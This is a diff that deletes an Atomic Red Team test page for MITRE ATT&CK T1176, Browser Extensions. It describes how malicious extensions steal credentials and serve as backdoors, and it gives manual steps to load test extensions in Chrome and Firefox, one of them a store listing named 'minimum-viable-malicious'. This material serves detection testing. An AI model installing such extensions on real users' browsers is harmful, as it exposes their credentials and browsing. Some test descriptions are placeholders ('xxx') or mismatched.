<br/>
|
||||
@@ -1,79 +0,0 @@
|
||||
# T1176 - Browser Extensions
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
<blockquote>Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition)
|
||||
|
||||
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser, to include credentials, (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control (Citation: Chrome Extension C2 Malware).
|
||||
|
||||
Detection: Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
|
||||
|
||||
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: Network protocol analysis, Packet capture, System calls, Process use of network, Process monitoring, Browser extensions
|
||||
|
||||
Permissions Required: User
|
||||
|
||||
Contributors: Justin Warner, ICEBRG</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Chrome (Developer Mode)](#atomic-test-1---chrome-developer-mode)
|
||||
|
||||
- [Atomic Test #2 - Chrome (Chrome Web Store)](#atomic-test-2---chrome-chrome-web-store)
|
||||
|
||||
- [Atomic Test #3 - Firefox](#atomic-test-3---firefox)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Chrome (Developer Mode)
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Linux, Windows, macOS
|
||||
|
||||
|
||||
#### Run it with these steps!
|
||||
1. Navigate to [chrome://extensions](chrome://extensions) and
|
||||
tick 'Developer Mode'.
|
||||
|
||||
2. Click 'Load unpacked extension...' and navigate to
|
||||
[Browser_Extension](../t1176/)
|
||||
|
||||
3. Click 'Select'
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Chrome (Chrome Web Store)
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Linux, Windows, macOS
|
||||
|
||||
|
||||
#### Run it with these steps!
|
||||
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
|
||||
in Chrome
|
||||
|
||||
2. Click 'Add to Chrome'
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Firefox
|
||||
Create a file called test.wma, with the duration of 30 seconds
|
||||
|
||||
**Supported Platforms:** Linux, Windows, macOS
|
||||
|
||||
|
||||
#### Run it with these steps!
|
||||
1. Navigate to [about:debugging](about:debugging) and
|
||||
click "Load Temporary Add-on"
|
||||
|
||||
2. Navigate to [manifest.json](./manifest.json)
|
||||
|
||||
3. Then click 'Open'
|
||||
|
||||
<br/>
|
||||
Reference in New Issue
Block a user